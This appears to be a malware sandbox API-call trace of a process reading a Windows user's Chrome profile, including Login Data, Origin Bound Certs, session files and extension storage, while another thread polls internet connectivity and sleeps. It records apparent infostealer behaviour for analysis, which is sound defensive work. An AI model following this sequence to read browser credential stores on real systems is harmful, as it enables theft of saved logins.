Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,448 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,448 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Last Session DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,468 | 504 | NtReadFile |
Buffer => SNSS\x01\x00\x00\x00\x19\x00\x0e\x01\x00\x00\x00
\x00\x00\x00
\x00\x00\x00\x0c\x03\x00\x00&\x02\x00\x00\x01\x00\x00\x00 \x00 \x01\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x8d \x06\x88 \x00\x00\x02\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00chrome://chrome-signin/?source=0\x06\x00\x00\x00C\x00h\x00r\x00o\x00m\x00e\x00\x00 \x00\x00\xfc\x08\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00c\x00h\x00r\x00o\x00m\x00e\x00:\x00/\x00/\x00c\x00h\x00r\x00o\x00m\x00e\x00-\x00s\x00i\x00g\x00n\x00i\x00n\x00/\x00?\x00s\x00o\x00u\x00r\x00c\x00e\x00=\x000\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xed\xdcP\xf4\xcc\xfc\x04\x00\xee\xdcP\xf4\xcc\xfc\x04\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,568 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,568 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Last Tabs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,599 | 504 | NtReadFile |
Buffer => SNSS\x01\x00\x00\x00\x11\x00\x04\x01\x00\x00\x00\x00\x00\x00\x00#\x08\x12Bc[.\x00\xf9\x05\x01\xf4\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00https://www.python.org/download/\x1c\x00\x00\x00D\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00 \x00P\x00y\x00t\x00h\x00o\x00n\x00 \x00|\x00 \x00P\x00y\x00t\x00h\x00o\x00n\x00.\x00o\x00r\x00g\x00\xa0\x03\x00\x00\x9c\x03\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00p\x00y\x00t\x00h\x00o\x00n\x00.\x00o\x00r\x00g\x00/\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00/\x00\xff\xff\xff\xff\x00\x00\x00\x00,\x01\x00\x00.\x00\x00\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00w\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:37,789 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:37,789 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:37,789 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:37,789 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:37,789 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:37,809 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:37,809 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:37,899 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:37,899 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xcc\xa1\\xe0\x91\xcf\x01\xb0\xff\xa4d\xe4\x91\xcf\x01@\W\xcf\xe4\x91\xcf\x01@\W\xcf\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00@\W\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x10\x00P\x00A\x00F\x00K\x00B\x00G\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x00a\x00f\x00k\x00b\x00g\x00g\x00d\x00m\x00j\x00l\x00p\x00g\x00k\x00d\x00k\x00c\x00b\x00j\x00m\x00h\x00m\x00f\x00c\x00d\x00p\x00n\x00c\x00a\x00 |
SUCCESS | 0x00000000 | |
| 07:44:37,899 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:37,989 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:37,989 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\W\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01`m\x91\xcf\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 \xa0 \x9c@hx\x00\x00\x00\x00\x00\x00\x00\xe0\xc0l\xcf\xe4\x91\xcf\x01p\xa7\x8c\xd3\xe4\x91\xcf\x01p\xa7\x8c\xd3\xe4\x91\xcf\x01p\xa7\x8c\xd3\xe4\x91\xcf\x01S\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x000\x000\x000\x000\x003\x00.\x00l\x00o\x00g\x00 ? % Wp\x00\x00\x00\x00\x00\x00\x00\xd0\xf1[\xcf\xe4\x91\xcf\x01 \x17\x7f\xcf\xe4\x91\xcf\x01 \x17\x7f\xcf\xe4\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:37,989 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\LOG DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:37,989 | 504 | NtReadFile |
Buffer => 2014/06/26-20:50:13.807 3456 Delete type=3 #1
FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:37,989 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a4 |
FAILURE | 3221225489 | |
| 07:44:37,999 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\MANIFEST-000002 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:37,999 | 504 | NtReadFile |
Buffer => V\xf9\xb8\xf8\x1c\x00\x01\x01\x1aleveldb.BytewiseComparator\xa4\x9c\x8b\xbe\x08\x00\x01\x02\x03 \x00\x03\x04\x04\x00 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:37,999 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a4 |
FAILURE | 3221225489 | |
| 07:44:37,999 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:37,999 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:37,999 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:38,099 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:38,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0mb[\xe0\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\xf0\xfa\xc7\xe1\xe7\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \xe9\x1f\\xe0\x91\xcf\x01p3\xee\\xe0\x91\xcf\x01p3\xee\\xe0\x91\xcf\x01p3\xee\\xe0\x91\xcf\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00H\x00R\x00O\x00M\x00E\x00~\x001\x00.\x00L\x00O\x00C\x00c\x00h\x00r\x00o\x00m\x00e\x00-\x00e\x00x\x00t\x00e\x00n\x00s\x00i\x00o\x00n\x00_\x00p\x00a\x00f\x00k\x00b\x00g\x00g\x00d\x00m\x00j\x00l\x00p\x00 |
SUCCESS | 0x00000000 | |
| 07:44:38,099 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:38,099 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,109 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x08\x00\x01\x01\x00@ \x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00-\xe2\x1e
\x07\xfc\x00\x05\x04\x8e\x00\x07k\x07\xd3\x04\xe2\x07>\x04\x8e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,300 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,300 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,300 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,300 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,300 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Network Action Predictor DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,320 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00-\xe2\x1e
\x03\xfc\x00\x04\x02\x15\x00\x02\xe3\x03\xab\x02\x15\x02\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,390 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,390 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Network Action Predictor-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,400 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,420 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,420 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Origin Bound Certs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,430 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00-\xe2\x1e
\x03\xfc\x00\x04\x02<\x00\x03k\x03\xd3\x02<\x03&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,550 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,550 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Origin Bound Certs-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,550 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:38,560 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:38,570 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:38,590 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:38,590 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:38,590 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00182d20 | |
| 07:44:38,590 | 1308 | OpenServiceW |
ServiceControlManager => 0x00182d20 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172918 | |
| 07:44:38,590 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:38,590 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:38,590 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:38,650 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:38,650 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x10\x00S\x00H\x00O\x00C\x00K\x00W\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00h\x00o\x00c\x00k\x00w\x00a\x00v\x00e\x00 \x00F\x00l\x00a\x00s\x00h\x00 |
SUCCESS | 0x00000000 | |
| 07:44:38,650 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:38,860 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:38,860 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01 \xc4aQ\xe3\x91\xcf\x01 